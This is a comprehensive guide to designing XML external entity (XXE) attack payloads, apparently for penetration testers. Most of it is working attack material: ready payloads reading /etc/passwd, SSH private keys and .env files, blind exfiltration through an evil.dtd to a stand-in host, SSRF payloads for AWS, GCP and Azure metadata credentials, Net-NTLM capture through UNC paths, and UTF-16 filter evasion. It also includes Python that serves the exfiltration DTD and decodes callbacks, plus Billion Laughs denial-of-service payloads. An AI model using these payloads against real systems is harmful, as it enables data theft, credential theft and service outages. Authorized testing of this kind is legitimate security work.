XXE Payload Design
Comprehensive guide to designing effective XXE test payloads for various scenarios including classic XXE, blind XXE, and platform-specific attacks.
Overview
Effective XXE testing requires carefully crafted payloads tailored to the target environment and vulnerability type. This guide covers payload design principles, techniques, and platform-specific considerations.
Payload Categories:
- Detection Payloads - Confirm XXE vulnerability exists
- Exploitation Payloads - Extract data or perform SSRF
- Platform-Specific Payloads - Target Windows, Linux, or specific applications
- Evasion Payloads - Bypass filters and WAFs
- OOB Payloads - Blind XXE with out-of-band exfiltration
Design Principles:
- Start with simple detection payloads
- Escalate to exploitation after confirmation
- Use safe targets initially (/etc/hostname, not /etc/shadow)
- Test incrementally to understand parser behavior
- Document what works for future reference
Basic Detection Payloads
Purpose: Determine if XML parser expands entities
Strategy:
- Internal entity test - fastest, lowest impact (confirms DTD processing and entity expansion, not that external entities are resolved)
- External entity to safe file
- External entity with network callback
Progressive Testing:
- Level 1: Internal entity (completely safe)
- Level 2: External entity to safe local file
- Level 3: External entity to your controlled server
- Level 4: External entity to sensitive file
Indicators of Success:
- Entity value appears in response (classic XXE)
- HTTP request received at your server (blind XXE)
- Error message reveals file path
- Response time increases (may indicate processing)
Internal Entity Detection
<!-- Level 1: Internal entity test (safest) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY test "ENTITY_EXPANSION_SUCCESS">
]>
<root>
  <data>&test;</data>
</root>

<!-- Expected if the parser processes the DTD:
     Response contains: ENTITY_EXPANSION_SUCCESS

     Expected if it does not:
     Response contains: &test; (literal), an empty value,
     or a parse error (hardened parsers commonly reject any DOCTYPE)

     A hit here proves DTD processing and entity expansion, not that external
     entities are resolved; many parsers expand internal entities while
     refusing SYSTEM ones, so move on to Level 2 before calling it XXE -->

<!-- More specific test with unique marker -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY marker "xxe_test_12345">
]>
<root>
  <field>&marker;</field>
</root>

<!-- Search response for: xxe_test_12345 -->

Safe File Disclosure Detection
<!-- Level 2: External entity to safe files -->

<!-- Linux: Safe system files -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Windows: Safe system files -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Linux alternative: /etc/issue (login banner, present on most
     distributions and usually one or two lines) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/issue">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Expected if vulnerable:
     Response contains file contents
     (hostname, win.ini settings, OS version)

     These files are short, plain text and contain no '<' or '&', so they
     substitute cleanly into the document; that is why they are preferred
     over larger files for the first confirmation. If the OS is unknown,
     send the Linux and Windows payloads as separate requests and compare
     the responses and any error messages. -->

Out-of-Band Detection Payloads
When to Use OOB:
- Response doesn't include XML content (blind XXE)
- Entity expansion errors suppressed
- Content not reflected in response
- Need confirmation without visible output
OOB Techniques:
- HTTP callback to your server
- DNS lookup to your domain
- FTP connection attempt
- Parameter entity with external DTD
Required Infrastructure:
- HTTP server you control (or Burp Collaborator)
- DNS server with logging (or interactsh.com)
- Monitor access logs for incoming requests
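The parameter-entity technique listed above needs two things on your side: a correctly written external DTD and a listener that serves it and decodes what comes back. The following is an added example written for this guide (not code from the original page or from any tool it mentions). It assumes a placeholder attacker host, CALLBACK_BASE, that the exfiltrated value arrives in the data query parameter, and that the sample request paths used to exercise decode_callback are constructed rather than captured from a real target.

```python
#!/usr/bin/env python3
"""Stage-2 parameter-entity exfiltration: build evil.dtd, serve it, decode the callback.

Added example, not code from the original guide. Assumptions: the attacker
listener is reachable at CALLBACK_BASE (placeholder host), the callback carries
the file content in the 'data' query parameter, and any request paths fed to
decode_callback in tests are constructed, not captured from a real target.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlsplit

CALLBACK_BASE = "http://YOUR-SERVER.com"   # assumption: attacker-controlled host


def build_exfil_dtd(target_file: str, callback_base: str = CALLBACK_BASE,
                    param: str = "data") -> str:
    """Return the external DTD that reads target_file and sends it to the listener.

    The nested declaration spells '%' as '&#x25;'. A literal '%' inside an entity
    value is a parameter-entity reference on the first parse, so writing
    '<!ENTITY % exfiltrate' there is a well-formedness error; '&#x25;' is only
    turned into '%' when %eval; is expanded, which is when the declaration is wanted.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '
        f"'{callback_base}/?{param}=%file;'\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


def build_stage1_xml(dtd_url: str) -> str:
    """The document submitted to the target; it only pulls in the external DTD."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        f'  <!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "  %dtd;\n"
        "]>\n"
        "<root><data>test</data></root>\n"
    )


def decode_callback(request_target: str, param: str = "data") -> Optional[str]:
    """Pull the exfiltrated value out of a request line path such as
    '/?data=web-prod-01%0A'. Returns None for unrelated hits (the DTD fetch itself)."""
    values = parse_qs(urlsplit(request_target).query, keep_blank_values=True).get(param)
    return values[0] if values else None


class ListenerHandler(BaseHTTPRequestHandler):
    """Serves /evil.dtd and logs everything else as a callback."""
    dtd_text = build_exfil_dtd("/etc/hostname")   # single-line file: survives inside a URL

    def do_GET(self):
        if urlsplit(self.path).path == "/evil.dtd":
            body = self.dtd_text.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        data = decode_callback(self.path)
        self.log_message("callback from %s: data=%r", self.client_address[0], data)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    print(build_stage1_xml(f"{CALLBACK_BASE}/evil.dtd"))
    HTTPServer(("0.0.0.0", 8000), ListenerHandler).serve_forever()
```

Run it on the listener host, submit the printed stage-1 document to the target, and watch for two log lines: the GET for /evil.dtd (proof that external parameter entities are resolved) and then the callback carrying the file. The DTD targets /etc/hostname on purpose: the file content is placed inside a URL, and most parsers reject URLs containing newlines, so multi-line files need FTP or a base64 wrapper instead.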
HTTP Out-of-Band Payload
<!-- Simple HTTP callback -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://YOUR-SERVER.com/xxe-test">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Using Burp Collaborator -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-ID.burpcollaborator.net/xxe">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Using interactsh (hosted instance) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://YOUR-ID.oast.fun/xxe">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Expected:
     HTTP GET request received at your server
     Check access logs or Burp Collaborator
     Confirms XML parser makes external requests

     Use a unique path or subdomain per request (for example /xxe-test/<marker>)
     so each callback can be tied to the request that caused it; the fetch may
     arrive seconds later, or from a backend IP different from the one you
     submitted to. The callback fires whether or not the response echoes &xxe;,
     which is what makes this the confirmation for blind XXE. -->

Parameter Entity OOB (Advanced)
<!-- Step 1: Create external DTD on your server (evil.dtd) -->
<!-- evil.dtd contents:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://YOUR-SERVER.com/?data=%file;'>">
%eval;
%exfiltrate;
-->

<!-- Note the &#x25; in the nested declaration. Inside an entity value a
     literal "%" followed by a name is read as a parameter entity reference,
     so writing "<!ENTITY % exfiltrate ..." there is a well-formedness error.
     &#x25; survives the first pass and becomes "%" only when %eval; is
     expanded, which is exactly when the nested declaration is needed.
     %file; is expanded immediately, so the file is read while the DTD loads. -->

<!-- Step 2: Reference external DTD in payload -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER.com/evil.dtd">
  %dtd;
]>
<root>
  <data>test</data>
</root>

<!-- How it works:
     1. Parser loads evil.dtd
     2. evil.dtd defines parameter entities
     3. %file reads /etc/passwd
     4. %eval creates entity that sends data to your server
     5. %exfiltrate triggers the request
     6. Your server receives /etc/passwd in query string

     Caveat: the file content ends up inside a URL. Most parsers refuse a URL
     containing newlines or other illegal characters, so this works reliably
     only for single-line files (/etc/hostname is the usual first target).
     For multi-line files, exfiltrate to an FTP listener that accepts raw
     lines, or on PHP targets wrap the resource in
     php://filter/convert.base64-encode so the value becomes one token. -->

<!-- Simpler version for detection only -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://YOUR-SERVER.com/xxe.dtd">
  %remote;
]>
<root>
  <data>test</data>
</root>

<!-- xxe.dtd can be empty: the GET for it in your access log is the evidence
     that the parser resolves external parameter entities -->

Platform-Specific Payload Design
Linux Targets:
- /etc/passwd - User accounts
- /etc/shadow - Password hashes (requires root)
- /etc/hosts - Host mappings
- /proc/self/environ - Environment variables (NUL-separated, so it cannot be reflected inline; use a base64 wrapper or OOB)
- /proc/self/cmdline - Process command line (also NUL-separated)
- ~/.ssh/id_rsa - SSH private keys (the parser does not expand ~; use /home/<user>/.ssh/id_rsa or /root/.ssh/id_rsa)
- /var/log/apache2/access.log - Web logs (large, and request data in it may contain '<' or '&')
Windows Targets:
- C:/Windows/win.ini - Windows config
- C:/Windows/System32/drivers/etc/hosts - Host file
- C:/boot.ini - Boot configuration (older Windows)
- C:/inetpub/wwwroot/web.config - IIS config
- C:/Users/[username]/.ssh/id_rsa - SSH keys
Application-Specific:
- .env - Environment variables (many frameworks)
- web.config - ASP.NET configuration
- config/database.yml - Rails database config
- settings.py - Django settings
- composer.json / package.json - Dependency files
Application files need an absolute path: a relative SYSTEM identifier resolves against the parser's base URI, which is rarely the web root. Recover the deployment path from error messages, stack traces or a leaked config before trying these.
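Several of the targets above cannot be returned through a plain SYSTEM entity at all: the file content is substituted into the document as character data, so NUL bytes, '<' and '&' break well-formedness and produce a parse error instead of output. The following added example (written for this guide, not part of the original page) encodes that rule so you can decide per file whether to read it inline, through php://filter base64, or out of band. The SAMPLES dictionary is constructed stand-in content, not data from any real host.

```python
"""Which files can be disclosed inline, and which need a wrapper or OOB channel.

Added example, not code from the original guide. SAMPLES holds constructed file
contents that mimic the listed targets; it is not data from any real host.
"""
from typing import Dict, Tuple


def _is_xml_char(cp: int) -> bool:
    # XML 1.0 'Char' production: NUL and most C0 control characters are illegal
    return (cp in (0x9, 0xA, 0xD) or 0x20 <= cp <= 0xD7FF
            or 0xE000 <= cp <= 0xFFFD or 0x10000 <= cp <= 0x10FFFF)


def inline_safe(content: bytes) -> Tuple[bool, str]:
    """Return (ok, reason). ok means the bytes can be substituted as the replacement
    text of a general entity inside an element without breaking well-formedness."""
    try:
        text = content.decode("utf-8")
    except UnicodeDecodeError:
        return False, "not valid UTF-8 (binary file or another encoding)"
    for ch in text:
        if not _is_xml_char(ord(ch)):
            return False, f"illegal XML character U+{ord(ch):04X} (NUL-separated files such as /proc/self/environ)"
    if "<" in text:
        return False, "contains '<': parsed as markup (source code, HTML, XML config)"
    if "&" in text:
        return False, "contains '&': parsed as an entity reference"
    if "]]>" in text:
        return False, "contains ']]>': forbidden in character data"
    return True, "plain text, safe to reflect through a plain SYSTEM entity"


def disclosure_strategy(content: bytes, php_target: bool) -> str:
    """Pick the least noisy way to read a file whose shape is known or guessed."""
    ok, _ = inline_safe(content)
    if ok:
        return "inline"
    if php_target:
        return "php://filter/convert.base64-encode"   # base64 is plain text, so it reflects
    return "oob"   # parameter-entity or FTP exfiltration


# Constructed samples standing in for the listed targets (not real data)
SAMPLES: Dict[str, bytes] = {
    "/etc/hostname": b"web-prod-01\n",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/proc/self/environ": b"PATH=/usr/bin\x00DB_PASSWORD=s3cret\x00",
    "/var/www/html/index.php": b"<?php\n$pdo = new PDO('mysql:host=db', 'app', 'pw');\n",
    "/var/www/html/.env": b"DB_URL=mysql://app:pw@db/app?charset=utf8&timeout=5\n",
}


def triage(samples: Dict[str, bytes]) -> Dict[str, bool]:
    """Map each path to whether a plain SYSTEM entity would reflect it."""
    return {path: inline_safe(data)[0] for path, data in samples.items()}


if __name__ == "__main__":
    for path, data in SAMPLES.items():
        ok, reason = inline_safe(data)
        print(f"{path:28} inline={ok!s:5} {reason} -> {disclosure_strategy(data, php_target=True)}")
```

The same check explains a common false negative: a parse error after a file read is not proof that the entity was blocked. If the error mentions the file's path or quotes part of its content, the read succeeded and the content was the problem.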
Linux-Specific Payloads
<!-- Read /etc/passwd (plain text with no '<' or '&', so it reflects inline) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

<!-- Read application .env file (web root assumed to be /var/www/html;
     adjust to the path seen in error messages or configuration) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///var/www/html/.env">
]>
<root><data>&xxe;</data></root>

<!-- Read SSH private key ("user" is a placeholder; enumerate accounts and
     home directories from /etc/passwd first) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">
]>
<root><data>&xxe;</data></root>

<!-- Read application source code. This usually fails inline because "<?php"
     starts markup and the file is not well-formed XML. On PHP targets use
     php://filter/convert.base64-encode/resource=/var/www/html/index.php;
     elsewhere use an OOB channel. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///var/www/html/index.php">
]>
<root><data>&xxe;</data></root>

<!-- Read process environment (often contains secrets). /proc/self/environ is
     NUL-separated, and NUL is an illegal XML character, so the same base64
     wrapper or OOB approach is needed to get it back. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///proc/self/environ">
]>
<root><data>&xxe;</data></root>

Windows-Specific Payloads
<!-- Read win.ini -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>

<!-- Alternative path format with backslashes. Some resolvers (notably on
     .NET) accept it, others reject it, so keep the forward-slash form as
     the default and try this one only if it fails. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file://c:\Windows\win.ini">
]>
<root><data>&xxe;</data></root>

<!-- Read IIS web.config -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///C:/inetpub/wwwroot/web.config">
]>
<root><data>&xxe;</data></root>

<!-- Read hosts file -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<root><data>&xxe;</data></root>

<!-- UNC path to network share. Resolving \\attacker-server\share makes the
     host open an SMB connection and authenticate, so a capture tool running
     on attacker-server (Responder, for example) receives a Net-NTLM hash even
     though no file is ever returned. Also a useful blind-XXE indicator on
     Windows when HTTP egress is blocked but SMB is not. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:////attacker-server/share/file.txt">
]>
<root><data>&xxe;</data></root>

SSRF Payload Design
SSRF via XXE Targets:
- Internal web applications (http://localhost:8080)
- Cloud metadata services (http://169.254.169.254)
- Internal databases (MySQL, Redis, Memcached)
- Admin panels (http://admin.internal)
- Internal APIs (http://api.internal)
SSRF Techniques:
- Port scanning internal network
- Accessing cloud metadata (AWS, GCP, Azure)
- Interacting with internal services
- Bypassing IP-based restrictions
- Exploiting trust relationships
Common Targets:
- http://localhost - Local services
- http://127.0.0.1 - Loopback
- http://169.254.169.254 - Cloud metadata
- http://192.168.1.1 - Internal network
- http://10.0.0.1 - Private network
SSRF Payload Examples
<!-- Access localhost service -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<root><data>&xxe;</data></root>

<!-- AWS metadata service (IMDSv1). The listing returns the role name; put it
     at the end of the URL in a second payload to read the temporary keys.
     IMDSv2 needs a PUT to obtain a token plus a custom header on every
     request, neither of which an entity fetch can send, so an instance that
     enforces IMDSv2 answers 401 here. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

<!-- GCP metadata service. The v1 endpoint rejects requests without the
     "Metadata-Flavor: Google" header, which cannot be set through an entity
     URL, so expect a 403; the differing response or timing still shows the
     host can reach metadata.google.internal. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<root><data>&xxe;</data></root>

<!-- Azure IMDS. Requires the "Metadata: true" header, same limitation; a 400
     response is still evidence that the request left the parser. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
]>
<root><data>&xxe;</data></root>

<!-- Internal API -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://internal-api.local/secrets">
]>
<root><data>&xxe;</data></root>

<!-- A fetched body is only reflected when it is well-formed as entity
     content: JSON and plain text usually are, HTML usually is not. When the
     target returns markup, record the parse error (it often quotes part of
     the body) or switch to an OOB payload. -->

Filter Evasion Techniques
Common Filters to Bypass:
- Keyword blacklists (SYSTEM, ENTITY, DOCTYPE)
- Protocol restrictions (file://, http://)
- URL validation
- Character filtering
- Size limits
Evasion Techniques:
1. Encoding:
- Document encoding: send the body as real UTF-16 (BOM plus a matching declaration); filters that scan for the ASCII bytes of DOCTYPE or SYSTEM never see them
- URL encoding inside the SYSTEM URI (file:///%65%74%63/%70%61%73%73%77%64); the resolver decodes the URI, but DTD keywords are never URL-decoded, so %53%59%53%54%45%4D in place of SYSTEM does not parse
- Character references in entity values (&#x25; for %), used to nest declarations inside parameter entities; they cannot disguise keywords, because references are not expanded in markup
- Keyword case is not an evasion: XML is case-sensitive and conforming parsers reject DoCtYpE, EnTiTy and SyStEm as errors
2. Alternative Protocols:
- php:// wrapper (PHP)
- jar: protocol (Java; jar:http://host/archive.jar!/path)
- netdoc: protocol (older Java only)
- gopher:// protocol (old Java versions only; disabled by default since Java 7)
- ftp:// for OOB exfiltration (tolerates multi-line values better than http)
3. Path Manipulation:
- Path traversal (file:///var/www/../../../etc/passwd) when a filter checks the path prefix
- Double encoding
- Unicode normalization
4. DTD Variations:
- External DTD subset (<!DOCTYPE root SYSTEM "http://...">) when the internal subset is filtered
- Public identifiers
- Mixed internal/external DTD
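The encoding item above fails in practice more often than any other, because testers change the declaration but not the bytes. The following added example (written for this guide, not part of the original page) produces a genuinely UTF-16 body, shows that a naive byte-level keyword filter no longer matches it, and uses Python's bundled expat parser to confirm that a real decoder accepts the re-encoded document and rejects the declaration-only version. expat does not fetch external entities by default, so nothing is read from disk; SAMPLE_PAYLOAD is the guide's own /etc/passwd payload, and the keyword list in keyword_filter_hit is an assumed blacklist.

```python
"""Encoding-level evasion: make the bytes on the wire genuinely UTF-16.

Added example, not code from the original guide. expat is used only to show
what a real decoder does with each variant; it declines to fetch the external
entity, so no file is read. SAMPLE_PAYLOAD is the guide's Level 2 payload.
"""
import re
import xml.parsers.expat

SAMPLE_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<!DOCTYPE root [\n"
    '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    "]>\n"
    "<root><data>&xxe;</data></root>\n"
)

_XML_DECL = re.compile(r"^<\?xml\s[^?]*\?>\s*")


def reencode_payload(xml_text: str, encoding: str) -> bytes:
    """Rewrite the declaration to `encoding` and encode the whole document in it.
    Python's 'utf-16' codec prepends a BOM, which is how the parser picks byte order."""
    body = _XML_DECL.sub("", xml_text, count=1)
    return (f'<?xml version="1.0" encoding="{encoding.upper()}"?>\n' + body).encode(encoding)


def declaration_only(xml_text: str, encoding: str) -> bytes:
    """The common mistake: the declaration says UTF-16 but the bytes are still UTF-8."""
    body = _XML_DECL.sub("", xml_text, count=1)
    return (f'<?xml version="1.0" encoding="{encoding.upper()}"?>\n' + body).encode("utf-8")


def keyword_filter_hit(raw: bytes, keywords=(b"DOCTYPE", b"ENTITY", b"SYSTEM")) -> bool:
    """Model of a naive byte-level blacklist (assumed keyword list), the kind a
    WAF rule or an `if b"DOCTYPE" in body` check implements."""
    return any(k in raw for k in keywords)


def declared_entities(raw: bytes) -> dict:
    """Parse raw bytes with expat and return {name: system_id} for the general
    entities it saw. A non-empty result means the decoder understood the bytes
    and processed the DTD; an ExpatError means the document was rejected."""
    seen = {}

    def on_entity(name, is_parameter_entity, value, base, system_id, public_id, notation):
        if not is_parameter_entity:
            seen[name] = system_id

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = lambda *args: 1   # acknowledge the reference, do not fetch
    parser.Parse(raw, True)
    return seen


def parser_rejects(raw: bytes) -> bool:
    """True when expat refuses the document (for example, declared encoding
    does not match the actual bytes)."""
    try:
        declared_entities(raw)
    except xml.parsers.expat.ExpatError:
        return True
    return False


if __name__ == "__main__":
    utf8 = SAMPLE_PAYLOAD.encode("utf-8")
    utf16 = reencode_payload(SAMPLE_PAYLOAD, "utf-16")
    print("utf-8  filter hit:", keyword_filter_hit(utf8), "entities:", declared_entities(utf8))
    print("utf-16 filter hit:", keyword_filter_hit(utf16), "entities:", declared_entities(utf16))
    print("first bytes:", utf16[:12].hex(" "))
    print("declaration-only rejected:", parser_rejects(declaration_only(SAMPLE_PAYLOAD, "utf-16")))
```

When sending the UTF-16 body over HTTP, either omit the charset from Content-Type or set it to UTF-16; a charset=UTF-8 header may cause the application to transcode the body before the parser sees it, which reintroduces the ASCII keywords.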
Evasion Payload Examples
<!-- UTF-16 encoding. The declaration alone does nothing: the bytes sent must
     actually be UTF-16 (for example iconv -f UTF-8 -t UTF-16 payload.xml,
     which prepends a BOM), and the Content-Type charset, if set, must agree. -->
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

<!-- URL encoding inside the entity URI: the resolver decodes it, a filter
     matching the literal string /etc/passwd does not -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///%65%74%63/%70%61%73%73%77%64">
]>
<root><data>&xxe;</data></root>

<!-- Mixed-case keywords do NOT work. XML is case-sensitive and a conforming
     parser rejects the following before any entity is processed:
<!DoCtYpE root [
  <!EnTiTy xxe SyStEm "file:///etc/passwd">
]>
     If a filter is case-insensitive, changing case gains nothing; if it is
     case-sensitive, the parser still rejects the document. -->

<!-- PHP wrapper (PHP applications). Output is base64, decode it locally.
     This is also the practical way to read files that would otherwise break
     the document inline, such as PHP source or NUL-separated /proc files. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root><data>&xxe;</data></root>

<!-- External DTD to bypass inline filtering -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd">
<root><data>test</data></root>

<!-- evil.dtd contains the actual entity definitions. To reflect data,
     reference one of them in the body (&xxe;); for blind targets use the
     parameter-entity chain. Some parsers load the external subset only when
     validating, so watch your server log for the GET of evil.dtd either way. -->

Denial of Service Payloads
Warning: DoS payloads can crash applications and consume resources. Only test with explicit permission in controlled environments.
DoS Techniques:
- Billion Laughs (exponential entity expansion)
- Quadratic Blowup (nested entity expansion)
- External entity to slow resource
- Large file disclosure
- Recursive entity references (a well-formedness error, so conforming parsers reject them; only worth a quick check against custom or lenient parsers)
Testing Safely:
- Start with small expansion factors
- Test in non-production first
- Monitor resource usage
- Have rollback plan
- Coordinate with operations team
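"Start with small expansion factors" and "monitor resource usage" are easier to honour if the expansion is computed before anything is sent. The following added example (written for this guide, not part of the original page) sizes a nested-entity payload from its depth and fan-out, refuses to build one over a byte budget, and confirms the arithmetic on small instances with Python's bundled expat parser. The e0..eN entity names and the one-megabyte default budget are choices made here; the 'lol' leaf and factor of 10 match the Billion Laughs payload in the guide.

```python
"""Size an entity-expansion payload before sending it.

Added example, not code from the original guide. The byte budget and the e0..eN
entity names are choices made here; the 'lol' leaf and the factor of 10 match
the Billion Laughs payload in the guide. expat is used only to confirm the
arithmetic on small instances.
"""
import xml.parsers.expat


def expansion_size(depth: int, fanout: int, leaf: str = "lol") -> int:
    """Bytes of character data the top-level entity expands to: each level
    references the one below it `fanout` times, so fanout**depth leaves."""
    return fanout ** depth * len(leaf.encode("utf-8"))


def within_budget(depth: int, fanout: int, leaf: str = "lol", max_bytes: int = 1_000_000) -> bool:
    return expansion_size(depth, fanout, leaf) <= max_bytes


def build_expansion_payload(depth: int, fanout: int, leaf: str = "lol",
                            max_bytes: int = 1_000_000) -> str:
    """Return the payload, refusing to build one whose expansion exceeds max_bytes.
    depth=2, fanout=5, leaf='a'*10 reproduces the guide's 250-byte 'safer test'."""
    size = expansion_size(depth, fanout, leaf)
    if size > max_bytes:
        raise ValueError(f"expansion would be {size:,} bytes, over the {max_bytes:,} byte budget")
    decls = [f'  <!ENTITY e0 "{leaf}">']
    for level in range(1, depth + 1):
        refs = f"&e{level - 1};" * fanout
        decls.append(f'  <!ENTITY e{level} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE root [\n' + "\n".join(decls)
            + f"\n]>\n<root>&e{depth};</root>\n")


def expanded_length(payload: str) -> int:
    """Count the characters a real parser emits for the root element's content.
    expat 2.4 and later refuse large amplification on their own (one reason the
    classic payload no longer works everywhere); the sizes used here stay below
    that limit, so the count matches expansion_size."""
    total = 0

    def on_text(data: str) -> None:
        nonlocal total
        total += len(data)

    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = on_text
    parser.Parse(payload, True)
    return total


if __name__ == "__main__":
    for depth in range(1, 10):
        print(f"lol{depth}: {expansion_size(depth, 10):>15,} bytes")
    print(build_expansion_payload(2, 5, "a" * 10))
    print("parser produced", expanded_length(build_expansion_payload(2, 5, "a" * 10)), "bytes")
```

Raise the budget one order of magnitude at a time and watch the target's memory and response time between steps; a parser that rejects the payload with an entity-expansion or amplification error is behaving correctly, and that response is worth recording in the report.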
DoS Payload Example (Use Carefully)
<!-- BILLION LAUGHS - Use only in authorized testing! -->
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>

<!-- This expands to 10^5 = 100,000 "lol" strings (300,000 bytes).
     Each additional level multiplies by 10: lol9 is 10^9 copies, about 3 GB.
     Current libxml2 and expat abort on this amplification by default; a
     parser that does not is the finding. -->

<!-- Safer test: Small expansion (250 bytes) -->
<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY a "aaaaaaaaaa"> <!-- 10 a's -->
  <!ENTITY b "&a;&a;&a;&a;&a;"> <!-- 50 a's -->
  <!ENTITY c "&b;&b;&b;&b;&b;"> <!-- 250 a's -->
]>
<test>&c;</test>

<!-- External entity to a resource that never returns EOF. /dev/random (and
     /dev/zero, /dev/urandom) keeps producing data, so the parser reads until
     a size limit, timeout or memory exhaustion stops it. This ties up a worker
     rather than spiking CPU, so watch request timeouts and worker counts. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///dev/random">
]>
<root><data>&xxe;</data></root>

Payload Design Checklist
Pre-Testing:
☐ Obtain written authorization
☐ Understand target platform (Linux/Windows)
☐ Identify XML processing endpoints
☐ Set up OOB infrastructure (server/Collaborator)
☐ Prepare monitoring tools
Payload Progression:
☐ Step 1: Internal entity test
☐ Step 2: External entity to safe file
☐ Step 3: External entity with OOB callback
☐ Step 4: Sensitive file disclosure (if authorized)
☐ Step 5: SSRF attempts
☐ Step 6: Platform-specific payloads
Testing Best Practices:
☐ Start with least invasive payloads
☐ Document what works and what doesn't
